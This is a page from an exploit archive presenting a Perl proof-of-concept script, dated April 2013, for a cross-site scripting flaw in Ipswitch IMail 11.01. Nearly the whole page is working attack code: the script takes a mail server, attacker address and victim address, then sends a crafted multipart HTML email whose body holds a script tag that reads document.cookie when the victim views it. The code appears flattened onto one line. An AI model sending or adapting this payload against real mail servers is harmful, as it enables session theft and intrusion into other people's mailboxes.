Home / exploits Ipswitch IMail 11.01 Cross Site Scripting
Posted on 30 April 2013
#!/usr/bin/perl # Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability # Date: 26-04-2013 # Author: DaOne aka Mocking Bird # Vendor Homepage: http://www.ipswitch.com/ # Platform: windows use Net::SMTP; # ARGV Check if ($#ARGV != 2) { print " USAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email> "; exit; } $host = $ARGV[0]; $attacker = $ARGV[1]; $victim = $ARGV[2]; # Config SMTP $smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server "; # Attacker and Victim email $smtp->mail($attacker); $smtp->to($victim); # Send email $buffer = "From: XSS ". "To: testing ". "Subject: testing ". "MIME-Version: 1.0 ". "Content-Type: multipart/mixed; ". " boundary="--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019" ". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019 ". "Content-Type: text/html; ". "charset="utf-8" ". "Content-Transfer-Encoding: quoted-printable ". "XSS ". "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> ". "<HTML><BODY> ". "<script >alert(document.cookie)</script > ". "</BODY></HTML> ". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--"; $smtp->data(); $smtp->datasend($buffer); $smtp->quit(); print "Send. "; # Proof http://oi40.tinypic.com/34yw8hz.jpg
